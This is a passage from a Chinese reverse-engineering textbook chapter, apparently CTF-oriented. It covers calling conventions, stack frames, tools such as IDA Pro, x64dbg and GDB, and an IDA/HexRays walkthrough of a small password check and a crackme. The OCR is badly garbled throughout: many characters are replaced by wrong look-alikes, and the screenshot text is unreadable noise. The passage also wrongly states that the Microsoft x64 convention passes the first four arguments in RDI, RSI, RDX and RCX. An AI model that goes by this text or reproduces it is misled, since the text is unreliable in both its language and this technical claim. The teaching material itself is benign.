随 着 软件 规模 增 大 ， 开 发 人 员 不 断 增多 ， 遂 数 之 间 的 天 系 同步 变 得 越 来 越 复 杂 ， 如 果 每 个 开 友 人 员 使 
用 不 同 的 规则 传递 消 数 参数 ， 则 程序 往往 会 出 现 各 种 匪夷所思 的 错误 ,程序 的 维护 开支 会 变 得 非常 
大 。 为 此 ， 在 编译 器 出 现 后 ， 人 们 为 编译 器 创立 了 一 些 规定 各 遂 数 之 间 的 参数 传递 的 约定 ， 称 为 调用 
Cr UE 


(1) x86 32 位 架构 的 调用 约定 


学 _Cdecl: 参数 从 石 同 左 依次 压 入 栈 中 ， 调 用 完毕 ， 由 调用 者 负责 将 这 些 压 入 的 参数 清理 
掉 ， 返 回 值 置 于 EAX 中 。 绝 大 多 数 x86 平 台 的 C 语 言 程序 都 在 使 用 这 种 约定 。 


学 _stdcall: 参数 同样 从 右 同 左 依次 压 入 栈 中 ,调用 完毕 ， 由 被 调用 者 负责 清理 压 入 的 参 
数 ， 返 回 值 同 样 置 于 EAX 中 。Windows 的 很 多 API 都 是 用 这 种 方式 提供 的 。 


学 _thiscall: 为 类 万 法 专门 优化 的 调用 约定 ,将 类 万 法 的 this 指 针 放 在 ECX 寄 存 器 中 ， 然 后 
将 其 余 参 数 压 入 栈 中 。 


学“ fastcall: 为 加 速 调用 而 生 的 调用 约定 ， 将 第 1 个 参数 放 在 ECX 中 ， 将 第 2 个 参数 放 在 EDX 
中 ， 然 后 将 后 续 的 参数 从 右 至 左 压 入 材 中 。 


(2) x86 64 位 架构 的 调用 约定 


必 Microsoft x64 位 (x86-64) 调用 约定 : 在 Windows 上 使 用 ， 依 次 将 前 4 个 参数 放 入 RDI、 
RSI、RDX、RCX 这 4 个 宵 存 器 ， 然 后 将 剩 下 的 参数 从 石 至 左 压 入 栈 中 。 


学 SystemV x64 调 用 约定 : 在 Linux、MacOS 上 使 用 ， 比 Microsoft 的 版 本 多 了 两 个 宵 存 器 ， 
使 用 RDI、RSI、RDX、RCX、R8、R9 这 6 个 寄存 器 传递 前 6 个 参数 ， 剩 下 的 从 右 至 左 压 栈 。 


5. 局 部 变量 


写 程 序 的 时 候 ， 程 序 员 经 常会 使 用 局 部 变量 。 但 是 在 汇编 中 只 有 寄存 器 、 栈 、 可 写 区 段 、 堆 ， 函 数 的 
[=| 


Es 
失效 。 考 虑 到 这 种 特性 ， 人 们 将 局 部 变量 存放 在 栈 上 ， 在 每 次 消 数 被 调用 时 ， 程 序 从 栈 上 分 配 一 段 空 
间 ， 作 为 存储 局 部 变量 的 区 域 。 


每 个 沙 数 在 被 调用 的 时 候 都 会 产生 这 样 的 局 部 变量 的 区 域 、 存 储 返回 地 址 的 区 域 和 参数 的 区 域 ， 见 图 
5-1-2。 程 序 一 层 层 地 深入 调用 辫 数 ， 每 个 沙 数 自己 的 区 域 束 一 层 层 地 填 在 栈 上 。 


局 部 变量 
返回 地 址 
参数 

局 部 变量 
返回 地 址 
参数 
局 部 变量 
返回 地 址 
参数 
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图 5-1-2 
人 们 把 每 个 沙 数 目 己 的 这 一 片区 域 称 为 帧 ， 由 于 这 些 帧 都 在 栈 上 ， 所 以 又 被 称 为 栈 帧 。 然 而 ， 栈 的 内 
存 区 域 并 不 一 定 是 固定 的 ， 而 且 随 着 每 次 调用 的 路 径 不 同 ， 栈 帧 的 位 置 也 会 不 同 ， 那 么 如 何 才 能 正确 
引用 局 部 变量 呢 ? 


里 然 栈 的 内 容 随 着 进 栈 和 出 栈 会 一 直 不 断 变 化 ， 但 是 一 个 立 数 中 每 个 局 部 变量 相对 于 该 消 数 栈 帧 的 偏 
移 都 是 固定 的 。 所 以 可 以 引入 一 个 寄存 器 来 专 | 存储 当前 栈 帧 的 位 置 ， 即 ebp， 称 为 帧 指针 。 程 序 在 
肖 数 初始 化 阶段 赋值 ebp 为 栈 巾 中 间 的 某 个 位 置 ， 这 样 可 以 用 ebp 引 用 所 有 的 局 部 变量 。 由 于 上 一 层 
的 父 冰 数 也 要 使 用 ebp， 因 此 要 在 消 数 开始 时 先 保存 ebp， 表 赋 值 ebp 为 目 己 的 栈 帧 的 值 ， 这 样 的 流 
程 在 汇编 代码 中 便 是 经 典 的 组 合 : 


现在 每 个 溺 数 的 栈 帧 便 由 局 部 变量 、 父 栈 帧 的 值 、 返 回 地 址 、 参 数 四 部 分 构成 。 可 以 看 出 ，ebp 在 初 
始 化 后 实际 上 指向 的 是 父 栈 帧 地 址 的 存储 位 置 。 因 此 ，*ebp 形 成 了 一 个 链表 ， 代 表 一 层 层 的 函数 调用 
链 。 

随 着 编译 技术 的 友 展 ， 编 译 器 也 可 以 通过 跟 趴 计算 每 个 指令 执行 时 栈 的 位 置 ， 从 而 直接 越过 ebp， 而 
使 用 栈 指 针 esp 来 引用 局 部 变量 。 这 样 可 以 节省 每 次 保存 ebp 时 需要 的 时 间 ， 并 增加 了 一 个 通用 寄存 
器 ， 从 而 提高 了 程序 性 能 。 


于 是 现在 有 了 两 种 消 数 : 一 是 有 帧 指针 的 遂 数 ， 二 是 经 过 优化 后 没有 帧 指针 的 遂 数 。 现 代 的 分 析 工 具 
(如 IDA Pro 等 ) 将 使 用 高 级 的 栈 指针 跟 中 方法 来 针对 性 地 处 理 这 两 种 消 数 ， 从 而 正确 处 理 局 部 变 


本 节 介 绍 在 软件 逆向 工程 中 的 常用 的 工具 ， 工 具 的 具体 使 用 方法 将 在 后 续 章 节 中 叙述 。 
1. IDA Pro 


IDA (Interactive DisAssembler) Pro (以 下 简称 IDA) 是 一 款 强大 的 可 执行 文件 分 析 工 具 ， 可 以 对 
包括 但 不 限于 x86/x64、ARM、 MIPS 等 架构 ，PE、ELF 等 格式 的 可 执行 文件 进行 静态 分 析 和 动态 调 
试 。IDA 集 成 了 Hex-Rays Decompiler， 提 供 了 从 汇编 语言 到 C 语 言 伪 代码 的 反 编 译 功能 ， 可 以 极 大 
地 减少 分 析 程 序 时 的 工作 量 ， 其 界面 见 图 5-1-3 和 图 5-1-4。 


2. OllyDbg 和 x64dbg 


OllyDbg 是 Windows 32 位 环境 下 一 蒜 优 秀 的 调试 器 ， 最 强大 的 功能 是 可 扩展 性 ， 许 多 开 友 者 为 其 开 
及 了 具备 各 种 功能 的 插件 ， 能 够 绕 过 许多 软件 保护 措施 。 但 OllyDbg 在 64 位 环境 下 已 经 不 能 使 用 ， 许 
多 人 因此 转 而 使 用 了 x64dbg。 


OllyDbg 和 x64dbg 的 界面 见 图 5-1-5 和 图 5-1-6。 


3. GNU Binary Utilities 


GNU Binary Utilities (binutils) 是 GNU 提 供 的 二 进 制 文件 分 析 工 具 链 ， 包 含 的 工具 见 表 5-1-4。 
5-1-7 和 图 5-1-8 为 binutils 中 工具 的 简单 应 用 例子 。 


古 园 中” 的 种 和 和 矶 四 -XX > OO 
bE | 


Tt 
Li feeti ar frtio A Iaatrvetim 而 wereret 由 Etoraal sebol 汪 区 六 和 ER 
Te noxl 公 ThA Wh 人 人 一 一 了 一 家 
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; Int cdecl main(int orge, const char “"argy, const char “"envp) 
plic nein 
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ver_410° byte ptr "410 
Var_ Sn doed Per “4 
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rsp, <30h 

rep, [rsp+8eh] 
"in 
[rbp+3e0h+ yar 4)], 9 


de clea otors 
suis 
neewrity init cookie 
repert extuilure 


rex, Formet 

printf 

raw, (rbp*300hewar <10] 
rdx, rax 


rex, %5 
scanf 

rax， [rbp+*300hewar 410] 
rex, rax 

verify pessword 
[rbp+3pehevar 4], eax 
[rebp+3B6hevar 4)], 9 
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Ne Edit Jump Search View Debugger Options Windows Help 
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门 Punctions window De x 国 IDA View-A 加 加 Psewdocode~A 回 
| ilint _ cdecl main(int argc, const char **argv, const char “*envp) 


:uncion name Segment 


nmingw invalidParaneteriiandler .tert 
pre_c inmit .ext 
pre_opp_init -tert 
__ taaninCEIStartop text 
YinNainCEIStartup . tert 
mainCEIStartup tort 
verify password ,text 
main ,tert 
_decode poinmter . ext 
_encode pointer ,tert 
人 .kext 
Mingr_raise_matherr text 
_ mingw setusermstherr . kext 
_matherr . Eext 
eport error , tart 
.et 
_pei366 runtinme relocator ,tort 
__ wingw SEN error handler . kext 
mingw init ehandler ,tert 
fpreset ,kext 
de global dtors . text 
de Elobal ctors ,kext 
. text 
_security init cookie , tert 
report gsfailure . ext 
_dyn tls dtor .tert 


chor V4; /i 
int v5; /7/ I 


main(); 
9 @; 
while ( 1 ) 


printf( "please input password: -3 
scanf("%s", &v4); 
5 = verify password(&v4); 
if ( iv5 ) 
break; 
puts( incorrect password!™); 
} 
puts("Congratulation! You have passed the verification!”"); 
return 0; 
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ET 


链接 器 | owicopy | 复员 目标 文件 ,过 程 中 可 以 修改 
性 能 分 析 工 具 程序 显示 目标 文件 的 相关 信息 ， 亦 可 反 汇编 


产生 部 态 库 的 案 引 

|_ 可 以 对 静态 库 进行 创建 、 修 改 和 取出 操作 。 | readelf 。 | 显示 ELF 文件 的 内 容 
ae | 一 列 出 总 体 和 Section 的 大 小 
列 出 任何 二 进 制 的 可 显示 字符 由 
ss | 从 目标 文件 中 移 除 符号 


NW de i = 产生 Windows 消息 资源 
| windres 。 | Windows 资源 编译 器 


图 5-1-=7 


图 5-1-8 
eC] D] > 


GDB (GNU Debugger) 是 GNU 提 供 的 一 球 命 令 行 调试 器 ， 拥 有 强大 的 调试 功能 ， 并 且 对 于 含有 调 
试 符号 的 程序 支持 源码 级 调试 ， 同 时 支持 使 用 Pythoni 语 言 编 写 扩展 ,一般 用 到 的 扩 ee 


We (=) deale [oYe NESE DA ICD El Nl 10 为 使 用 gef 擂 件 时 的 命令 行 界面 


二 


图 5-1-9 
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5.2 静态 分 析 


逆向 工程 的 最 基本 方法 是 静态 分 析 ， 即 不 运行 二 进 制程 序 ， 而 是 直接 分 析 程序 文件 中 的 机 器 指令 
种 信息 。 目 前 ， 静 态 分 析 最 常用 的 工具 是 IDA Pro， 本 节 以 IDA Pro 的 使 用 为 基础 介绍 静态 分 析 的 一 般 
方法 。 


5.2.1 1DA 使 用 入 门 
本 节 所 需 代码 文件 为 1-helloworld。 


1. 打开 文件 


IDA Pro 是 业界 最 成 熟 、 先 进 的 反 汇 编 工 具 之 一 ， 使 用 的 是 递归 下 降 反 汇编 算法 ， 本 下 档 急 步 介绍 
Pro 的 使 用 。 


IDA 的 界面 十 分 简洁 ， 安 装 后 会 弹出 许可 协议 (License) 窗口 ， 根 据 界 面 提 示 操 作 即 可 进入 Quick 
界面 ， 风 图 35-2-1。 


Disassemble a new file 
| go | Work on your own 
Load the old disassembly 


Display at startup 
2 
在 界面 中 单 击 “New” 按 钮 ， 并 在 弹出 的 对 话 杠 中 选择 要 打开 的 文件 ， 也 可 以 单 击 “Go” 按 钮 ， 然 
后 在 打开 的 界面 中 将 文件 拖 岛 进去 ,或 者 通过 单 击 “Previous” 按 钮 、 双 击 列表 项 等 快速 打开 之 前 打 
开 过 的 文件 。 


注意 ， 在 打开 文件 前 需要 选择 正确 的 架构 版 本 (32bit/64bit) 。 用 户 可 以 通过 file 等 工具 来 查看 文件 
的 架构 信息 ， 不 过 更 方便 的 方案 是 随便 打开 一 个 架构 的 IDA， 然 后 在 加 载 的 时 候 即 可 知道 文件 的 架构 
信息 ， 见 图 5-2-2，IDA 显 示 此 文件 为 xX86-64 架 构 的 ELF64 文 件 ， 所 以 换 用 64bit 版 本 的 IDA 再 次 打开 
即 可 ， 打 开 后 会 弹出 “Load a new flle ”对话 框 。 


Load file D:\'aawae ea NN 和 exanples\1-helloworld\1-helloworld as 
ELF64 for x86-64 (Shared object) [eli 





Processor type 


MetaPC (disassemble all opcodes) [metapc] ~ set | 
Analysis 上 
Loading segment 00000000 Kernel options 2 


回 Enabled 
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Loading offset 00000000 器 Indicator enabled | Processor options | 
Options 


加 Loading options 口 Load resources 

口 Fill segment gaps 器 Rename DLL entries 
Create segments 器] Manual load 
Create FLAT group Create imports segment 


Load as code segment 


Ce Pee Cs 


2 . 加 载 文件 


“Load a new file” 对 话 框 中 的 选项 主要 针对 高 级 用 户 ， 初 学 者 可 以 使 用 默认 设置 ， 不 需 改动 ， 单 击 
“OK” 按 钮 ， 加 载 文件 进入 IDA。 注 意 : 在 初次 使 用 时 ，IDA 可 能 弹出 选择 是 否 使 用 bs A 

”的 对 话 框 ， 单 击 “No” 按 钮 ， 进 入 正常 的 反 汇 编 界 面 。 此 时 ， IDA 会 为 文件 生成 一 个 数据 让 
(IDB) ， 将 整个 文件 所 需 的 内 容 存 入 其 中 ， 见 图 5-2-3。 以 后 的 分 析 中 就 不 再 需要 访问 输入 文件 了 ， 
对 数据 库 的 各 种 修改 也 会 独立 于 输入 的 文件 。 


图 5-2-3 的 界面 被 分 成 几 部 分 ， 分 别 介 绍 如 下 。 


2 
“ie 


| 


DE NE 
情况 。 


导 
令 反 汇 编 的 主 窗口 : 显示 反 汇 编 的 结果 、 控 制 流 图 等 ， 可 以 进行 拖 动 、 选 择 等 操作 。 
吕 


令 函数 窗口 : 显示 所 有 的 函数 名 称 和 地 址 ( 拖 动 下 方 滚动 条 即 可 查看 到 ) ， 可 以 通过 Ctrl+F 
组 合 键 进行 第 选 。 


他 输出 窗口 : 显示 运行 过 程 中 IDA 的 日 志 ， 也 可 以 在 下 方 的 输入 框 中 输入 命令 并 执行 。 
多 状态 指示 器 : 显示 为 “AU: idle” 即 代表 IDA 已 经 完成 了 对 程序 的 自动 化 分 析 。 


在 反 汇 编 窗口 中 ， 使 用 右键 菜单 或 者 快捷 键 空 格 可 以 在 控制 流 图 和 文本 界面 反 汇 编 间 切换 ， 见 图 5-2- 
4。 


Eile Edit Jonp Seorch Vieo 0Debugger Qptions Windous Help 
[入 -vo a |; 四 - 


; Attributes: bp-based frame 
3 int _cdecl main(int argc, const char **argv, const char **envp) 
public main 
main proc near 
unwind { 
push 


mov 
lea 
call 
mov 


pop 


retn 
; } // starts at 63A 
main end 





Line 10 of 17 
赎 0utput vindew 


Python 2.7.13 (v2.7.13:a66454blafal，Dec 17 2616，26:53:49) [MSC v,1566 64 bit (AND64)] 
DAPython 64-bit v1.7.9 final (serial 9) (c) The IDAPython Team <idapython8googlegroups.com> 


ropagating type information。 
unction argument information ‘has been propagated 
Th utoanalysis has been finished. 


图 5-2-3 


File Edit Junp Seorch Vieu Debugger Qptions Windows Heblp 


车 则 :e+- 的 物 入 稳 避 同 @ 博 是 加 小 - 疡 卫 XX > 0 口 [wieeeer 避 昌 团 ; 团体 他 
:和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 和 


上 Library function 国 Regalar function MM Instruction 时 Data 大 Unexplored ’ External synbol 
回 Functions win… 口 上 xX | [ 国 IDA Vie-A 加 Hex View-! 回 LT 回国 nms 回 ” 辆 Inports 2 上 日 


Function none 
; Attributes: bp-based frame 


; int _cdecl main(int argc, const char **argv, const char *“*envp) 
PN YES 
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ra 汪 i. . re ; DATA XREF: start+iDto 
register_tm_clone 
do_slobal_dtors_ sux 


全 人 从 从 


| 


< 
Line 10 of 17 
国 Output windov 


The initial autoanalysis has been finished 
AU idle Down Disk: 2968 


图 5-2-4 
3. 数据 类 型 操作 


IDA 的 一 大 亮点 是 用 户 可 以 通过 界面 交互 来 自由 控制 反 汇 编 的 流程 。 在 加 载 文件 的 过 程 中 ，IDA 已 经 

尽 其 所 能 ， 为 用 户 上 自动 定义 了 大 量 位 置 的 类 型 ， 如 IDA 将 代码 段 的 多 数 数据 正确 标注 为 代码 类 型 ， 并 

对 其 进行 了 反 汇 编 ， 将 特殊 段 的 部 分 位 置 标注 为 8 字 节 整 型 qword。 然 而 ，IDA 的 能 力 是 有 限 的 ， 一 般 

情况 下 并 不 能 正确 标 出 所 有 的 数据 类 型 ， 而 用 户 可 以 通过 正确 定义 1 字 节 或 一 段 区域 的 类 型 ， 来 4 下 
出 现 的 问题 ， 从 而 更 好 地 进行 反 汇编 工作 。 


低 版 本 IDA 没 有 撤销 功能 ， 所 以 操作 前 需要 小 心 ， 并 且 掌 握 这 些 操作 对 应 的 相反 操作 。 


用 户 可 以 根据 地 址 的 颜色 来 分 辨 某 个 位 置 的 数据 类 型 。 被 标注 为 代码 的 位 置 ， 其 地 址 将 会 是 黑色 显示 
的 ; 标注 为 数据 的 位 置 ， 为 灰色 显示 ; 未 定义 数据 类 型 的 位 置 则 会 显示 为 黄色 ， 黑 框 位 置 即 不 同 颜色 
的 地 址 ， 见 图 5-2-5。 


ss libec csw fini Ss fini 
libc csu init ; ini 


下 面 介绍 一 部 分 定义 数据 类 型 的 快捷 键 。 使 用 这 些 快 捷 键 的 时 候 需要 让 焦点 (光标) 在 对 应 行 上 才能 
SE 


:EE 
击 “Yes” 按 钮 即 可 。 


仿 D (Data) 键 : 即 让 某 一 个 位 置 变 成 数据 。 一 直 按 D 键 ， 这 个 位 置 的 数据 类 型 将 会 以 1 字 节 

(byte/db) 、2 字 节 (word/dw) 、4 字 节 (dword/dd) 、8 字 节 (qword/dq) 进行 循 
环 。IDA 为 了 防止 误 操 作 ， 如 果 定 义 数 据 的 操作 会 影响 到 已 经 有 数据 类 型 的 位 置 ，IDA 会 弹出 
确认 的 对 话 框 ;如果 操作 的 位 置 及 其 附近 完全 是 Undefined， 则 不 会 弹出 确认 对 话 框 。 


邻 C (Code) 键 : 即 让 某 一 个 位 置 变 为 指令 。 确 认 对 话 框 的 弹出 时 机 也 与 D 刍 类似。 在 定义 
三 


为 指令 后 ，IDA 会 自动 以 此 为 起 始 位 置 进行 递归 下 降 反 汇编 。 


上 面 是 基本 的 定义 数据 的 快捷 键 。 为 了 应 对 日 益 复 杂 的 数据 类 型 ，IDA 还 内 建 了 各 种 数据 类 型 ， 如 数 
组 、 字 符 串 等 。 


入 A (AsCll) 键 : 会 以 该 位 置 为 起 点 定义 一 个 以 “0” 结尾 的 字符 串 类 型 ， 见 图 5-2-6。 
* 键 : 将 此 处 定义 为 一 个 数组 ， 此 时 弹出 一 个 对 话 框 ， 用 来 设置 数组 的 属性 。 
入 O (Offset) 键 : 即将 此 处 定义 为 一 个 地 址 偏 黎 ， 见 图 5-2-7。 


db “Hello World!',8 3 DATA XREF: main+4f+o 
cnrd<e 
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Em 


4 . 函数 操作 


实际 上 ， 反 汇编 并 不 是 完全 连续 的 ， 而 是 由 分 散 的 各 函数 拼凑 而 成 的 。 每 个 函数 有 局 部 变量 、 调 用 约 
定 等 信息 ， 控 制 流 图 也 只 能 以 函数 为 单位 生成 和 显示 ， 故 正确 定义 函数 同样 非常 重要 。1IDA 也 有 处 理 
销 数 的 操作 


们 删除 函数 : 在 函数 窗口 中 选中 国 数 后 ， 按 Delete 键 。 
定义 函数 : 在 反 汇 编 窗 口中 选中 对 应 行 后 ， 按 P 键 。 


改 孙 数 参数 : 在 函数 窗口 中 选中 并 按 Ctrl+E 组 合 键 ， 或 在 反 汇 编 窗 口 的 函数 内 部 按 Alt+P 


在 定义 函数 后 ，IDA 即 可 进行 很 多 函数 层面 的 分 析 ， 如 调用 约定 分 析 、 枝 变量 分 析 、 函 数 调用 参数 分 
析 等 。 这 些 分 析 对 于 还 原 反 汇 编 的 高 层 语义 都 有 着 直接 和 巨大 的 帮助 。 


5 .导航 操作 


里 然 可 以 通过 妃 标 点 击 在 不 同 的 消 数 之 间 切 换 ， 但 是 随 着 程序 规模 的 增 大 ， 使 用 这 种 方式 来 定位 显得 
不 太 现 实 。IDA 有 导航 历史 的 功能 ， 类 似 资源 管理 器 和 浏览 器 的 历史 记录 ， 可 以 后 退 或 者 前 进 到 某 次 
浏览 的 地 方 。 


多 后 退 到 上 一 位 置 : 快捷 键 Esc。 

多 前 进 到 下 一 位 置 : 快捷 键 Ctrl+ Enter。 

学 跳 转 到 某 一 个 特定 位 置 : 快捷 键 G， 然 后 可 以 输入 地 址 /已 经 定义 的 名 称 。 
学 跳 转 到 某 一 区 段 : 快捷 键 Ctrl+ S$， 然 后 选择 区 段 即 可 。 


6. 类 型 操作 


IDA 开 友 了 一 套 类 型 分 析 系 统 ， 用 来 处 理 C/C++ 语 言 的 各 种 数据 类 型 (函数 声明 、 变 量 声明 、 结 构 体 
声明 等 ) ， 并 且 允 许 用 户 自由 指定 。 这 无 疑 让 反 汇 编 的 还 原 变 得 更 加 准确 。 选 中 变量 、 函 数 后 按 Y 
键 ， 弹 出 “Please enter the type declaration” 对 话 框 ， 从 中 输入 正确 的 C 语 言 类 型 ，1DA 就 可 以 解 
析 并 自动 应 用 这 个 类 型 。 


7. IDA 操 作 的 模式 


IDA 快 捷 键 的 设计 有 一 定 的 模式 ， 因 此 我 们 可 以 加 强 快捷 键 的 记忆 ， 使 逆向 的 速度 更 快 ， 更 加 得 心 应 
手 。 


下 面 介绍 一 些 平 时 实践 中 总 结 的 操作 模式 和 学 习 近 巧 。 


学 1DA 的 反 汇 编 窗 口中 的 各 种 操作 在 选中 时 和 未 选中 时 会 有 不 同 的 功能 。 例 如 ， 快 捷 键 C 对 应 
的 操作 在 选中 反 汇 编 窗口 时 ， 能 指定 递归 下 降 反 汇编 的 扫 摘 区 域 . 


学 IDA 的 有 反 汇编 窗口 中 的 部 分 快捷 键 在 多 次 使 用 的 时 候 会 有 不 同 功 能 ， 如 快捷 键 O 在 对 着 同一 
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个 位 置 第 二 次 使 用 时 会 恢复 第 一 次 的 操作 。 


他 1DA 的 石 键 快捷 荣 单 中 会 标注 各 种 快捷 键 。 


学 1DA 的 对 语 框 的 按钮 可 以 通过 按 其 首 字 母 来 取代 鼠标 点 击 (如 “Yes” 按 钮 可 以 通过 按 Y 键 
来 代替 鼠标 点 击 ) 。 


我 们 掌握 这 些 模式 即 可 快速 学 习 IDA 的 快捷 键 ， 而 且 基 本 不 需 按 控制 刍 (Ctrl、Alt、Shift) 的 快捷 键 
特性 使 得 IDA 操 作 更 加 有 趣 。 


8. IDAPython 


IDAPython 是 IDA 内 建 的 一 个 Python 环境 ， 可 以 通过 接口 进行 数据 库 的 各 种 操作 ， 目 前 它 已 经 可 以 执 
行 绝 大 多 数 IDA SDK 中 的 C++ 水 数 和 所 有 IDC 水 数 ， 可 以 说 是 同时 有 着 1DC 的 便捷 和 C++SDK 的 强 
FS 


按 Alt+F7 组 合 键 ， 或 选择 “File 一 Script file” 菜单 命令 ， 可 以 执行 Python 脚 本 文件 ;输出 窗口 中 也 
有 一 个 Python 的 Console 框 ， 可 以 临时 执行 Python 语句 ; 按 Shift+F2 组 合 键 , 或 选择 “File 一 Script 
command” 菜单 命令 ， 可 以 打开 脚本 面板 ， 将 “Scripting language” 改 为 “Python”， 即 可 获 
得 一 个 简易 的 编辑 器 ， 见 图 5-2-8。 


Snippet list Please enter Script body 


Name ldef main(): 
tM Default snippet * 


Line | of | Line:4 Column:7 


Scripting language Python "| Tab size 


Import | 


528 
9. IDA 的 其 他 功能 


IDA 的 菜单 栏 “View 一 Open subviews” 下 可 以 打开 各 种 类 型 的 窗口 ， 见 图 5-2-9。 


Jump Seaorch View Debugger Lumino Qptions Windows HeULp 


pv" 中 ” 从 UP ry Quick vieo CtrL+l 
EE Gropns ; Oe 


' function 国 FF i 2 字 proximity browser 
:window 回 2 6enerate pseudocode 
nane ull Screen 11 回 tex dunp 

成 6roph 0vervieu 
rity_check_co 党 Recent Scripts ALt+F9 加 Exports 
or new(uint) 可 Database snapshot manager . . . Ctru+Shift+T Inports 
e_section(uch 司 p Nones Shift+F4 
A 团 站 seqment registers | PF Ections EYE 
tablnain_ott| & PrInt loternal fogs 图 strinas Shift+F12 
t_duUnain_bef = Hide CtrlLiNumnpad+— 转 Seonedts Shitt+F7 
t_dbLnaoin_crt 中 Unhide CtrU+Numpad++ 加 IE Shitt+F8 
603F9B = Hide ou 图 s 
t_dbbnain_exc Unhi [NR ea 
eh sionatur Shift+F5 
t_dLLmain_uni xX DelLete hidden range i 
8603FFF Ee Ta Te 贺 Type Libraries Shift+Fl1l 
t_initlallze_— 别人 | 园 Structures Shiftt+F9 


6804045 
后 + 
t_is_nonwritable_in_current_image 图 Enunerations Shift+F10 


t_reLease_startup_Lock | 图 Local types Shift+Fl 
t_uninitialLize_crt CUasses ARLt+Fl 
994185 : 区 Cross references 


t - 因 Function couts 
ee 


n_crt_dispatch(HINSTANCE _ x const,uUo… . 国 wotepod 
n_crt_process_attach(HINSTANCE__ x con… ， 加 problens 
n_crt_process_detach(bool) 办 Patched bytes CtrL+ALt+p 
n_dispatch(CHINSTANCE__ 大 const ,ubong,v** 

n_raowCHINSTANCE__ x const,uLong,void x** 


图 5-2=9 


Strings 窗 口 : 按 Shift+ F12 组 合 键 即 可 打开 ， 见 图 5-2-10， 可 以 识别 程序 中 的 字符 串 ， 双 击 即 可 在 反 
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汇编 窗口 中 定位 到 目标 字符 捉 。 
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十 六 进 制 窗口 : 默认 打开 ， 可 以 按 F2 键 对 数据 库 中 的 数据 进行 修改 ， 修 改 后 册 次 按 F2 键 即 可 应 用 修 


改 。 


加 四 四 


回回 加 四 四 区区 | 


| 


.text:10004…， 
.rdata:1000…， 
.rdata:1000… 
.rdata:1000…-. 
.rdata:1000…. 
.rdata:1000…: 
.rdata:1000… 
.rdata:1000… 
.rdata:1000… 
.rdata:1000.…: 
.rdata:1000…. 


00000005 
00000012 
0000000F 
00000015 
00000007 
00000010 
00000007 
0000000C 
00000010 
00000014 
00000014 


Unknown exception 
bad abUocation 

bad array new Length 
CTFCTF 

string too Long 
cblsid2 

clsid2appid 


*»» CTF.CTF 
“…… CTF.CTF.1 
“… hpartment 


图 5-2-10 


5.2.2 HexRays 反 编译 器 入 门 


5.2.1 节 介绍 的 IDA 的 基本 操作 是 让 IDA 正 确 识别 一 个 位 置 的 数据 类 型 和 阔 数 ， 这 些 操作 部 分 还 原 了 在 
可 执行 文件 ( 见 2.4.7 节 ) 中 提 到 的 链接 器 、 汇 编 器 造成 的 信息 丢失 。 本 节 介 绍 的 反 编译 器 将 尝试 把 编 
译 器 造成 的 信息 损失 还 原 ， 继 续 将 这 些 汇 编 指令 组 成 的 浮 数 还 原 为 万 便 阅读 的 形式 。 因 此 ， 让 反 编 译 
器 正确 地 工作 需要 正确 定义 数据 类 型 、 正 确 识别 遂 数 。 


本 节 介 绍 目前 世界 上 已 公开 的 最 先进 和 复杂 的 反 编 译 器 一 一 HexRays Decompiler ee 

) 。HexRays 作 为 IDA 的 插件 运行 ， 与 IDA 同 为 一 家 公司 开发 ， 与 IDA 有 着 紧密 的 联系 。HexRays 充 
分 利用 IDA 确 定 的 函数 局 部 变量 和 数据 类 型 ， 优 化 后 生成 类 似 C 语 言 的 伪 代 码 。 用 户 可 以 浏览 生成 的 伪 
代码 、 添 加 注释 、 重 命名 其 中 的 标识 符 ， 也 可 以 修改 变量 类 型 、 切 换 数据 的 显示 格式 等 ， 


1. 生成 伪 代 码 


本 证 配 套 文件 为 2-simpleCrackme。 要 使 用 这 个 插件 ， 需 要 先 让 它 生 成 伪 代 码 。 生 成 伪 代 码 所 需 的 
EE Na 
口 ， 显 示 反 编译 后 的 伪 代 码 ， 见 图 ?-2-11。 选 择 雹 侧 的 冰 数 列表 可 以 切换 到 不 同 的 函数 ， 不 需要 返回 
到 反 汇 编 窗 口 。 


当 光 标 移动 到 标识 符 、 关 键 字 、 常 量 上 时 ， 其 他 位 置 的 相同 内 容 也 会 被 高 亮 ， 方 便 查 看 和 操作 。 


2. 伪 代 码 构 成 


HexRays 生 成 的 伪 代 码 是 有 一 定 的 结构 的 ， 每 个 立 数 反 编译 后 ， 第 一 行 都 为 溺 数 的 原型 ,然后 是 局 部 
变量 的 声明 区 域 ， 最 后 是 辫 数 的 语句 。 


其 中 上 部 为 变量 的 声明 区 域 。 有 时 比较 大 的 肖 数 的 区 域 会 很 长 而 影响 阅读 ， 可 以 通过 单 击 “Collapse 


declaration” <4 = 


注意 ， 每 个 局 部 变量 后 面 的 注释 实际 上 代表 着 这 个 变量 所 在 的 位 置 。 这 些 信息 会 万 便 理 解 对 应 汇编 代 
码 的 行为 。 


此 外 ， 伪 代码 中 的 变量 名 称 大 多 数 为 目 动 生成 的 ， 变 量 名 称 在 不 同 的 机 器 或 不 同 版 本 的 IDA 上 可 能 
所 不 同 。 


3. 修改 标识 符 


查看 IDA 生 成 的 伪 代 码 2-simpleCrackme.c ( 见 图 5-2-12) ， 可 以 看 到 HexRays 非 常 强大 ， 已 经 自动 
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命名 了 很 多 变量 。 但 是 这 些 变 量 的 名 称 并 没有 实际 意义 ， 随 着 消 数 规模 变 大 ， 没 有 意义 的 变量 名 称 将 
影响 分 析 效 率 。 因 此 ，HexRays 为 用 户 提 供 了 更 改 标识 符 名 称 的 功能 : 将 光标 移动 到 标识 待 上 ， 
然后 按 N 键 ， 弹 出 更 改名 称 的 对 话 框 ， 在 输入 框 中 输入 一 个 合法 的 名 称 ， 单 击 “OK” 按 钮 即 可 。 修 改 
后 的 伪 代 码 更 加 便于 阅读 和 分 析 。 


size t v3; // es 

EE result; // e 

She" v5; // [rsp+ #8h] [rbp-ASh] 
Bi; // [rsp+Ch] [rbp-A4h] 

Cr v7[8]; // [r sp 人 [rbp-Aeh] 


[rb 
ee int64 vi1l; // Ee. a [rbp-18h] 
vil = _readfsqword(9x28u 


); 
strcpy(v7, "zpdt{Pxn_zxndl tnf ddzbff!}"); 
memset(5, 0, sizeof(s)); 
= 0; 


trlen(s); 
f (v3 == strlen(v7) ) 
{ 
for ( i= 0; i <= strlen(s); ++i ) 
if ( s[i] <= 96 || s[i] > 122 ) 


64 || s[i] > 98 ) 


下 和 
v5 = (162 * (s[i] - 65) + 3) % 26 + 65; 
else 
v5 = (192 * (s[i] - 97) + 3) % 26 + 97; 
if ( v5 l= v7[i] ) 
puts("Wrong answer!"); 
return 1; 
: } 
puts("Congratulations!"); 
result = 0; 


} 

else 
